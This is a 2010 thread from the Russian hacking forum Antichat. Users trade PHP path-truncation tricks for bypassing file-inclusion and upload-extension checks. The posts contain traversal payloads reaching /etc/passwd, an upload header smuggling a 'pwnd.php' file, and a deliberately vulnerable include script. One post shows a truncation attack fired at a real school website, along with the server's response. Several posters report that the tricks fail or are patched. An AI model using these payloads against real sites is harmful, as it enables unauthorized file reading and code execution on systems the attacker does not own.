Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

15.03.2010, 23:13
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме: 2223440
Репутация:
648
|
|
Сообщение от budden
А кто-нибудь проверял как эта техника работает с file_exists()?
Эта функция подвержена обычному null-byte, однако данной техникой я не смог ее обойти на своей системе..
Код:
$filename = 'your-some-real-dir/../../../../../../../etc/passwd'.str_repeat("/.", 2020).'soap.php';
if (file_exists($filename)) {
echo "The file $filename exists";
include($filename);
} else {
echo "The file $filename does not exist";
}
Хм, у меня тоже не сработало, значит функция file_exists() не подвержена уязвимости.
U.P.D. Но возможно многие функции, работающие с файлами подвержены. Надо найти причину в исходниках.
Сообщение от Nek1t
Мб туповатый вопрос, но при
PHP код:
[...]
$imageName = $_FILES['myImage']['name'];
move_uploaded_file($_FILES['myImage']['tmp_name'], "images/" . $imageName);
[...]
этот баг сработает?
Хм, по идее нет, проверю - отпишу... А вообще...
Надо сначала научиться создавать файлы с длиной имени в 4096 символов)
Последний раз редактировалось Root-access; 16.03.2010 в 12:14..
|
|
|

15.03.2010, 23:24
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме: 405538
Репутация:
23
|
|
Надо сначала научиться создавать файлы с длиной имени в 4096 символов)
Код:
--UPLOAD_DATA_8CA3
Content-Disposition: form-data; name=file; filename=pwnd.php[//////].jpg
Content-Type: image/jpeg
Content-Transfer-Encoding: binary
|
|
|

16.03.2010, 01:18
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме: 2223440
Репутация:
648
|
|
Сообщение от Nek1t
Код:
--UPLOAD_DATA_8CA3
Content-Disposition: form-data; name=file; filename=pwnd.php[//////].jpg
Content-Type: image/jpeg
Content-Transfer-Encoding: binary
Нет, этот трюк не выходит. То есть если писать набор слешей, они воспринимаются, как переход к новой директории, и расширение не обрезается. Если писать точки, тоже не выходит...
Последний раз редактировалось Root-access; 16.03.2010 в 19:26..
|
|
|

20.03.2010, 05:52
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме: 3363660
Репутация:
1148
|
|
win xp sp2
Server API Apache 2.0 Handler
PHP Version 5.3.1
Apache/2.2.4
allow_url_fopen On
allow_url_include Off
1.php
PHP код:
include ($_GET['f'].'.php');
if($yes)
{
echo '<br>использовано ".": '.strlen($_GET['f']);
}
lol.txt
Инклуд с текущего каталога!
Код:
http://localhost/include/1.php?f=lol.txt[.]
http://localhost/include/1.php?f=lol.txt[%20]
http://localhost/include/1.php?f=lol.txt[%22]
http://localhost/include/1.php?f=lol.txt[.%20]
За пределы!
Код:
http://localhost/include/1.php?f=inc/lol.txt[.]
etc
(:чтоб была ясна - не работает баг!
Последний раз редактировалось Strilo4ka; 20.03.2010 в 19:00..
|
|
|

24.04.2010, 23:07
|
|
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
Провел на форуме: 2375131
Репутация:
1695
|
|
Strilo4ka не совсем понял что ты имела ввиду. есть такая вещь как php suhosin patch.
с последними версиями этого патча. ни нул байт не работает, ни обрезание строк.
__________________
Cервер cs 1.6
cs.antichat.net:27015
|
|
|

25.04.2010, 04:00
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Strilo4ka, в php 5.3+ бага закрыта
|
|
|

14.05.2010, 11:37
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме: 818095
Репутация:
34
|
|
PHP Version 4.4.9
Linux
Apache 2.*
Никак не могу отбросить .php но блин как чувствую должно работать, кто нибудь эксперементировал на подобной версии?
|
|
|

04.06.2010, 15:31
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме: 472147
Репутация:
211
|
|
зачастую бывает просто пишет "превышен лимит значений" и все  и ничего интерестного просто непроисходит....
Код:
http://www.sman1-tasik.sch.id/index.php?exec=/home/sloki/user/h21071/sites/sman1-tasik.sch.id/www/theme/Demo/index.php////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
ALERT - configured GET variable value length limit exceeded - dropped variable 'exec' (attacker '00.000.000.000', file '/s/www.sman1-tasik.sch.id/www/index.php') X-Powered-By: PHP/5.2.6-1+lenny8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: maxrow=20; expires=Fri, 03-Jun-2011 17:00:00 GMT Set-Cookie: uselang=Indonesia; expires=Fri, 03-Jun-2011 17:00:00 GMT Set-Cookie: theme=Demo; expires=Fri, 03-Jun-2011 17:00:00 GMT Content-type: text/html
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|